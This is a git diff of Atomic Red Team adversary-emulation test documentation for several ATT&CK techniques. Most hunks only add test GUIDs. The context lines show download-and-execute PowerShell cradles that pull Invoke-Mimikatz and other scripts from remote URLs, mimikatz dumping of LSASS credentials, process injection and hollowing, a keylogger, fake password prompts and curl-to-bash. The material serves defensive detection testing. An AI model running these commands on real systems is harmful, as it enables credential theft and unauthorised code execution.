## Atomic Test #1 - ListCronjobs -Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. +auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + +Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | namespace | K8s namespace to list | String | default| @@ -43,15 +45,17 @@ kubectl get cronjobs -n #{namespace}
## Atomic Test #2 - CreateCronjob -Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. +auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + +Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | namespace | K8s namespace to list | String | default| diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md index d0e78dc8..76a8f433 100644 --- a/atomics/T1055.001/T1055.001.md +++ b/atomics/T1055.001/T1055.001.md @@ -16,18 +16,20 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via mavinject.exe + +auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 + Windows 10 Utility To Inject DLLS. Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| | dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll| @@ -48,7 +50,7 @@ mavinject $mypid /INJECTRUNNING #{dll_payload} ##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1055.004/T1055.004.md b/atomics/T1055.004/T1055.004.md index 9b71ca04..a007e2cc 100644 --- a/atomics/T1055.004/T1055.004.md +++ b/atomics/T1055.004/T1055.004.md @@ -16,6 +16,9 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via C# + +auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1 + Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques @@ -25,14 +28,13 @@ Excercises Five Techniques 4. IatInjection 5. ThreadHijack Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_binary | Output Binary | Path | PathToAtomicsFolder\T1055.004\bin\T1055.exe| diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index f3965a9e..e514407f 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -16,16 +16,18 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
## Atomic Test #1 - Process Hollowing using PowerShell + +auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c + This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe| | parent_process_name | Name of the parent process | string | explorer| @@ -55,15 +57,17 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
## Atomic Test #2 - RunPE via VBA -This module executes notepad.exe from within the WINWORD.EXE process +auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b + +This module executes notepad.exe from within the WINWORD.EXE process **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word | String | Word| @@ -89,7 +93,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 9a4adae9..48f20359 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -16,12 +16,14 @@ More sophisticated samples may perform multiple process injections to segment mo
## Atomic Test #1 - Shellcode execution via VBA + +auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 + This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines. Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office is required. - **Supported Platforms:** Windows @@ -49,7 +51,7 @@ try { $path = $wdApp.Path Stop-Process -Name "winword" if ($path.contains("(x86)")) { exit 1 } else { exit 0 } -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -63,18 +65,20 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz + +auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). It must be executed in the context of a user who is privileged on remote `machine`. The effect of `/inject` is explained in - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | machine | machine to target (via psexec) | string | DC1| | mimikatz_path | Mimikatz windows executable | path | %tmp%\mimikatz\x64\mimikatz.exe| @@ -96,7 +100,7 @@ The effect of `/inject` is explained in ## Atomic Test #1 - Input Capture + +auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 + Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filepath | Name of the local file, include path. | Path | $env:TEMP\key.log| @@ -58,12 +60,14 @@ Remove-Item $env:TEMP\key.log -ErrorAction Ignore
## Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d + +auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b + Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. - **Supported Platforms:** Linux diff --git a/atomics/T1056.002/T1056.002.md b/atomics/T1056.002/T1056.002.md index a5a12710..4cedb33c 100644 --- a/atomics/T1056.002/T1056.002.md +++ b/atomics/T1056.002/T1056.002.md @@ -14,9 +14,11 @@ Adversaries may mimic this functionality to prompt users for credentials with a
## Atomic Test #1 - AppleScript - Prompt User for Password + +auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15 + Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html - **Supported Platforms:** macOS @@ -39,10 +41,12 @@ osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Pr
## Atomic Test #2 - PowerShell - Prompt User for Password + +auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 + Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py - **Supported Platforms:** Windows diff --git a/atomics/T1056.004/T1056.004.md b/atomics/T1056.004/T1056.004.md index dfb41588..f9fef8ef 100644 --- a/atomics/T1056.004/T1056.004.md +++ b/atomics/T1056.004/T1056.004.md @@ -15,15 +15,17 @@
## Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages -Hooks functions in PowerShell to read TLS Communications +auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 + +Hooks functions in PowerShell to read TLS Communications **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | Dll To Inject | Path | PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll| | server_name | TLS Server To Test Get Request | Url | https://www.example.com| @@ -44,7 +46,7 @@ curl #{server_name} -UseBasicParsing ##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} +if (Test-Path #{file_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index 0457a658..40a1227b 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md @@ -14,17 +14,19 @@ In Windows environments, adversaries could obtain details on running processes u
## Atomic Test #1 - Process Discovery - ps + +auto_generated_guid: 4ff64f0b-aaf2-4866-b39d-38d9791407cc + Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | path of output file | path | /tmp/loot.txt| @@ -50,10 +52,12 @@ rm #{output_file}
## Atomic Test #2 - Process Discovery - tasklist + +auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 + Utilize tasklist to identify processes. Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. - **Supported Platforms:** Windows diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index 8345c90c..aa9120ec 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -50,15 +50,17 @@ PowerShell commands/scripts can also be executed without directly invoking the <
## Atomic Test #1 - Mimikatz -Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. +auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027 + +Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| @@ -79,17 +81,19 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
## Atomic Test #2 - Run BloodHound from local disk + +auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350 + Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | File path for SharpHound payload | String | PathToAtomicsFolder\T1059.001\src| @@ -115,7 +119,7 @@ Remove-Item $env:Temp\*BloodHound.zip -Force ##### Description: SharpHound.ps1 must be located at #{file_path} ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} +if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -129,10 +133,12 @@ Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804
## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle + +auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 + Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. - **Supported Platforms:** Windows @@ -162,8 +168,10 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
## Atomic Test #4 - Obfuscation Tests -Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" +auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 + +Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" **Supported Platforms:** Windows @@ -188,8 +196,10 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys -Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. +auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d + +Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. **Supported Platforms:** Windows @@ -212,10 +222,12 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
## Atomic Test #6 - Invoke-AppPathBypass + +auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372 + Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ - **Supported Platforms:** Windows @@ -238,17 +250,19 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
## Atomic Test #7 - Powershell MsXml COM object - with prompt + +auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da + Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1| @@ -269,17 +283,19 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
## Atomic Test #8 - Powershell XML requests + +auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 + Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml| @@ -300,17 +316,19 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
## Atomic Test #9 - Powershell invoke mshta.exe download + +auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af + Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct| @@ -331,9 +349,11 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
## Atomic Test #10 - Powershell Invoke-DownloadCradle + +auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 + Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. - **Supported Platforms:** Windows @@ -353,9 +373,11 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
## Atomic Test #11 - PowerShell Fileless Script Execution + +auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73 + Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder. - **Supported Platforms:** Windows @@ -385,10 +407,12 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
## Atomic Test #12 - PowerShell Downgrade Attack + +auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e + This test requires the manual installation of PowerShell V2. Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - **Supported Platforms:** Windows @@ -409,7 +433,7 @@ powershell.exe -version 2 -Command Write-Host $PSVersion ##### Description: PowerShell version 2 must be installed ##### Check Prereq Commands: ```powershell -if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} +if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -423,15 +447,17 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
## Atomic Test #13 - NTFS Alternate Data Stream Access -Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. +auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 + +Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ads_file | File created to store Alternate Stream Data | String | $env:TEMP\NTFS_ADS.txt| @@ -456,7 +482,7 @@ Remove-Item #{ads_file} -Force -ErrorAction Ignore ##### Description: Homedrive must be an NTFS drive ##### Check Prereq Commands: ```powershell -if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} +if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -470,16 +496,18 @@ Write-Host Prereq's for this test cannot be met automatically
## Atomic Test #14 - PowerShell Session Creation and Use + +auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd + Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | hostname_to_connect | The host to connect to, by default it will connect to the local machine | String | $env:COMPUTERNAME| @@ -508,7 +536,7 @@ Try { } Catch { exit 1 -} +} ``` ##### Get Prereq Commands: ```powershell @@ -522,15 +550,17 @@ Enable-PSRemoting
## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations -Executes powershell.exe with variations of the -Command parameter +auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7 + +Executes powershell.exe with variations of the -Command parameter **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen| | command_param_variation | The "Command" parameter variation to use | String | C| @@ -552,7 +582,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -566,15 +596,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments -Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied +auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790 + +Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen| | command_param_variation | The "Command" parameter variation to use | String | C| @@ -597,7 +629,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -611,15 +643,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations -Executes powershell.exe with variations of the -EncodedCommand parameter +auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 + +Executes powershell.exe with variations of the -EncodedCommand parameter **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen| | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E| @@ -641,7 +675,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -655,15 +689,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments -Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied +auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b + +Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E| | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen| @@ -686,7 +722,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1059.002/T1059.002.md b/atomics/T1059.002/T1059.002.md index f748438d..ac93ee4f 100644 --- a/atomics/T1059.002/T1059.002.md +++ b/atomics/T1059.002/T1059.002.md @@ -16,11 +16,13 @@ Adversaries may abuse AppleScript to execute various behaviors, such as interact
## Atomic Test #1 - AppleScript + +auto_generated_guid: 3600d97d-81b9-4171-ab96-e4386506e2c2 + Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit. You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request. Reference: https://github.com/EmpireProject/Empire - **Supported Platforms:** macOS diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index a682a7b9..920ce645 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -16,15 +16,17 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
## Atomic Test #1 - Create and Execute Batch Script -Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. +auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388 + +Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Command to execute within script. | string | dir| | script_path | Script path. | path | $env:TEMP\T1059.003_script.bat| @@ -48,7 +50,7 @@ Remove-Item #{script_path} -Force -ErrorAction Ignore ##### Description: Batch file must exist on disk at specified location (#{script_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{script_path}) {exit 0} else {exit 1} +if (Test-Path #{script_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -63,15 +65,17 @@ Set-Content -Path #{script_path} -Value "#{command_to_execute}"
## Atomic Test #2 - Writes text to a file and displays it. -Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. +auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e + +Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_contents_path | Path to the file that the command prompt will drop. | path | %TEMP%\test.bin| | message | Message that will be written to disk and then displayed. | string | Hello from the Windows Command Prompt!| diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md index 1b5be0f8..db220177 100644 --- a/atomics/T1059.004/T1059.004.md +++ b/atomics/T1059.004/T1059.004.md @@ -16,15 +16,17 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
## Atomic Test #1 - Create and Execute Bash Shell Script -Creates and executes a simple bash script. +auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 + +Creates and executes a simple bash script. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_path | Script path | path | /tmp/art.sh| @@ -52,10 +54,12 @@ rm #{script_path}
## Atomic Test #2 - Command-Line Interface + +auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c + Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. - **Supported Platforms:** macOS, Linux diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index 42e8cd66..e78a44ae 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -18,17 +18,19 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
## Atomic Test #1 - Visual Basic script execution to gather local computer information + +auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9 + Visual Basic execution test, execute vbscript via PowerShell. When successful, system information will be written to $env:TEMP\T1059.005.out.txt. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | vbscript | Path to sample script | String | PathToAtomicsFolder\T1059.005\src\sys_info.vbs| @@ -52,7 +54,7 @@ Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore ##### Description: Sample script must exist on disk at specified location (#{vbscript}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{vbscript}) {exit 0} else {exit 1} +if (Test-Path #{vbscript}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -68,12 +70,14 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
